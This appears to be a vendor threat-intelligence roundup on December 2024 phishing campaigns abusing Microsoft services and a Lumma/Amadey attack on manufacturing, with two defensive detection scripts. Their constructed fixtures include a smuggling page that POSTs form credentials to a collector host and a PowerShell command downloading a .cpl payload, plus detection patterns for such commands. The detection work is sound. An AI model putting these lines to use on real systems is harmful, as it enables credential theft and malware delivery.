The cybersecurity research team at ANY.RUN, leveraging their Interactive Sandbox and Threat Intelligence Lookup tools, has uncovered and analyzed a range of emerging threats throughout December 2024.
The team highlighted fascinating trends and vital insights into the evolving threat landscape targeting prominent platforms, including Microsoft services and the manufacturing industry.
1. Cybercriminals Exploiting Microsoft Azure Blob Storage in Phishing Campaigns
Phishing Pages Smuggling HTML Documents
A new phishing campaign revealed how attackers are exploiting Microsoft’s Azure Blob Storage service. These cleverly crafted phishing pages, hosted on the *.blob.core.windows[.]net subdomain, use HTML smuggling to steal user credentials.
Tactics and Techniques
- Phishing pages are HTML documents with unique identifiers like a block input element labeled with the ID “doom”.
- The pages use JScript to collect user-specific information (OS, browser) to increase credibility.
- Credentials entered on fake login pages are stolen via an HTTP POST request sent to a malicious website such as nocodeform[.]io.
- Logos are dynamically pulled from the legitimate service logo[.]clearbit[.]com to enhance authenticity.
See the analysis session in the ANY.RUN sandbox.
Despite a short lifespan for these phishing pages, the minimal malicious content in the hosted pages enables them to evade detection for longer periods.
Analysis and Defense
ANY.RUN’s Interactive Sandbox has detailed analysis sessions available for these attacks. Using Threat Intelligence Lookup, security professionals can track malicious URLs targeting Azure Blob Storage by combining several domain constraints in one query, as follows.
domainName:".blob.core.windows.net" and domainName:"aadcdn.msauth.net" and domainName:"cdnjs.cloudflare.com" and domainName:"www.w3schools.com"
2. Microsoft OneDrive: Another Target of HTML Blob Smuggling
Phishing Disguised as Legitimate File Sharing
Attackers have extended their HTML smuggling tactics to Microsoft’s OneDrive service. Victims are lured in with a fake OneDrive login page, crafted to appear authentic.
Attack Chain Breakdown
- Users are baited through hyperlinks placed on OneDrive.
- After clicking the link, they are redirected to a page containing the smuggling code.
- Credentials entered are sent to a Command and Control (C2) server through an HTTP POST request.
- Victims are subsequently redirected to a legitimate website to cover the attack trail.
Key Findings
Visual assets, such as icons and backgrounds, are hosted on IPFS and imgur[.]com.
“After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.”
Base.js, a malicious script responsible for executing the attack, was extracted and decoded using ANY.RUN’s MITM (Man-in-the-Middle) feature.
3. Phishing Links Embedded in Microsoft Dynamics 365 Forms
Threat actors have turned Microsoft Dynamics 365 web forms into phishing tools by embedding malicious links. The seemingly legitimate URLs, hosted on microsoft.com’s subdomains, trick users into visiting fake pages.
Real-World Example
A typical phishing link might resemble: hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR...
The malicious page, mimicking a PDF download hosted on Microsoft’s services, deceives users into sharing sensitive information.
ANY.RUN’s Threat Intelligence tools can help uncover such attacks, allowing organizations to search for and analyze malicious forms in their sandbox environment.
4. LogoKit Phishing Framework Evolves
Modus Operandi of LogoKit
The widely-used LogoKit phishing toolkit exploits services offering dynamic logos and screenshots.
Its streamlined yet deceptive approach includes:
- Fetching company logos from logo[.]clearbit[.]com based on user-entered email domains.
- Hosting malicious scripts, styles, and images on platforms like Cloudflare Pages.
- Redirecting victims through decoy domains, such as a fake Asian grocery store site (asiangrocers[.]store), to evade detection.
Scripts and Data Theft
Three obfuscated JavaScript files were discovered, tasked with:
- Preventing page analysis.
- Collecting stolen credentials, which are then sent to the attackers’ C2 infrastructure through HTTP POST requests.
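The HTML smuggling pages in sections 1 and 2, the Dynamics 365 form links in section 3, and the LogoKit pages in section 4 share a small set of static traits that a defender can check for before a page is ever rendered: Blob/createObjectURL/atob construction of the real content, an input element with the ID "doom", a POST to a known form-collection host, a logo fetched from logo.clearbit.com, and visual assets pulled from IPFS or imgur. The triage script below is an added example written for this article, not ANY.RUN’s code; the sample page and the sample URLs are constructed, the ipfs.io gateway hostname is an assumption (only "IPFS" is named above), and the Dynamics 365 form id is a placeholder.

```python
"""Static triage of a suspected phishing page against the indicators described above.

Added example for this article; the sample HTML and URLs are constructed, not captured.
"""
import re
from urllib.parse import urlparse

# Constructed sample page that reproduces the reported traits (not real captured content).
SAMPLE_PAGE = """<html><body style="background:url(https://i.imgur.com/bg.png)">
<input type="hidden" id="doom" value="1">
<img src="https://logo.clearbit.com/example.com">
<script>
var b = new Blob([atob("PGh0bWw+")], {type: "text/html"});
var u = URL.createObjectURL(b);
fetch("https://nocodeform.io/f/abc", {method: "POST", body: new FormData(document.forms[0])});
</script>
</body></html>"""

# HTML smuggling primitives: the payload is assembled client-side from an encoded string.
SMUGGLING_PATTERNS = {
    "blob_object": re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
}
# Hosts named in the article as credential-collection or asset sources.
KNOWN_EXFIL_HOSTS = {"nocodeform.io"}
LOGO_SERVICE = "logo.clearbit.com"
# ipfs.io is an assumed public IPFS gateway; the article only says "IPFS".
DECOY_ASSET_HOSTS = {"imgur.com", "i.imgur.com", "ipfs.io"}


def extract_urls(html: str) -> list[str]:
    """Pull absolute http(s) URLs out of markup, CSS url() calls and script strings."""
    return re.findall(r"https?://[^\s\"'<>)]+", html, re.I)


def hosts_of(urls: list[str]) -> set[str]:
    """Lower-cased hostnames of the given URLs, skipping anything unparsable."""
    return {urlparse(u).hostname.lower() for u in urls if urlparse(u).hostname}


def triage(html: str) -> list[str]:
    """Return the sorted list of indicator names found in the page."""
    findings = []
    if re.search(r"id\s*=\s*[\"']doom[\"']", html, re.I):
        findings.append("input_id_doom")
    for name, pattern in SMUGGLING_PATTERNS.items():
        if pattern.search(html):
            findings.append(name)
    hosts = hosts_of(extract_urls(html))
    posts = re.search(r"method\s*:\s*[\"']POST[\"']|\.open\(\s*[\"']POST", html, re.I)
    if hosts & KNOWN_EXFIL_HOSTS and posts:
        findings.append("post_to_known_exfil_host")
    if LOGO_SERVICE in hosts:
        findings.append("dynamic_logo_fetch")
    if hosts & DECOY_ASSET_HOSTS:
        findings.append("assets_on_third_party_hosts")
    return sorted(findings)


def classify_link(url: str) -> str:
    """Label links that live on the legitimate Microsoft services abused in sections 1 and 3.

    A hit means "content on this host is user-supplied, inspect it", not "malicious".
    """
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host.endswith(".blob.core.windows.net"):
        return "azure-blob-hosted-page"
    if host == "customervoice.microsoft.com" and parsed.path.lower().endswith("/pages/responsepage.aspx"):
        return "dynamics365-form"
    return "other"


if __name__ == "__main__":
    print(triage(SAMPLE_PAGE))
    # The id value below is a placeholder, not the one from the article.
    print(classify_link("https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=PLACEHOLDER"))
```

The checks are deliberately cheap and static so they can run on a mail gateway or proxy before any script executes; a page that trips the smuggling primitives together with a POST to a third-party form collector is worth a sandbox detonation regardless of which brand it imitates.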
5. Targeted Attacks on the Manufacturing Industry: Lumma and Amadey Malware
December brought alarming news for industrial players as a combined attack leveraging Lumma Stealer and Amadey Bot was uncovered.
This sophisticated campaign focuses on stealing sensitive information and taking control of critical systems, posing a grave risk to the manufacturing sector.
Attack Chain Analysis
- Phishing emails contain URLs leading to LNK files disguised as PDFs.
- When activated, the LNK file initiates PowerShell via ssh.exe, triggering the download of a malicious CPL file.
- WMI (Windows Management Instrumentation) and PowerShell scripts gather extensive victim system information.
The coordinated use of Lumma (for data theft) and Amadey (for system control) emphasizes the growing complexity of attacks targeting industrial environments.
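The chain above (LNK, ssh.exe, PowerShell, a downloaded CPL file, WMI reconnaissance) leaves a distinctive parent-child pattern in process-creation telemetry. The script below is an added example written for this article, not ANY.RUN’s code or detection logic; it runs a few rules over constructed Sysmon-style process events (not real logs), and the command lines, paths and example.invalid URL are assumptions chosen to match the described chain.

```python
"""Process-tree rules for the Lumma/Amadey delivery chain described above.

Added example for this article; EVENTS are constructed, not real telemetry.
"""
import ntpath
import re

# Constructed process-creation events in the shape of Sysmon event ID 1 (pid, ppid, image, cmdline).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # User opened the LNK disguised as a PDF; the shortcut targets ssh.exe.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmdline": "ssh.exe"},
    # ssh.exe spawns PowerShell, which fetches the CPL into a user-writable directory.
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command Invoke-WebRequest https://example.invalid/update.cpl -OutFile $env:TEMP\update.cpl"},
    # Follow-on PowerShell gathers system information through WMI.
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-WmiObject Win32_OperatingSystem"},
    # Benign activity that must not fire.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_CMDLETS = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
CPL_FILE = re.compile(r"\.cpl\b", re.I)
USER_WRITABLE = re.compile(r"\\Temp\\|\\AppData\\|\\Downloads\\|\$env:TEMP", re.I)
WMI_RECON = re.compile(r"Get-WmiObject|Get-CimInstance|\bwmic\b|Win32_[A-Za-z]+", re.I)


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(events: list[dict], pid: int) -> list[str]:
    """Image names from the root of the tree down to pid, for analyst context."""
    index = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(basename(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return list(reversed(chain))


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Apply the chain rules to every event; returns (pid, rule_name) hits in event order."""
    index = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        parent = index.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Rule 1: PowerShell launched by the OpenSSH client has no normal business use on a workstation.
        if name in POWERSHELL and parent_name == "ssh.exe":
            hits.append((e["pid"], "powershell_spawned_by_ssh"))
        # Rule 2: PowerShell download cmdlet fetching a Control Panel item.
        if name in POWERSHELL and DOWNLOAD_CMDLETS.search(cmd) and CPL_FILE.search(cmd):
            hits.append((e["pid"], "powershell_downloads_cpl"))
        # Rule 3: any CPL referenced under a user-writable path rather than System32.
        if CPL_FILE.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append((e["pid"], "cpl_in_user_writable_path"))
        # Rule 4: WMI-based host inventory from the command line.
        if WMI_RECON.search(cmd):
            hits.append((e["pid"], "wmi_system_recon"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule, " -> ".join(ancestry(EVENTS, pid)))
```

Rule 1 is the cheapest and most specific signal in this chain; rules 2 to 4 fire on behaviour that legitimate administration scripts occasionally produce, so they are best weighted and correlated by ancestry rather than alerted on individually.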
About ANY.RUN
ANY.RUN is empowering over 500,000 cybersecurity professionals worldwide with its cutting-edge tools for malware analysis and threat intelligence.
Its Interactive Sandbox allows real-time malware interaction, while Threat Intelligence Lookup helps identify Indicators of Compromise (IOCs) and streamline incident response. With features like YARA Search, Feeds, and team collaboration, ANY.RUN is helping organizations stay ahead of evolving threats.
ANY.RUN Highlights
- Detect malware in seconds.
- Simulate and analyze threats in real-time.
- Scale sandbox environments effortlessly.
- Share findings and collaborate across teams.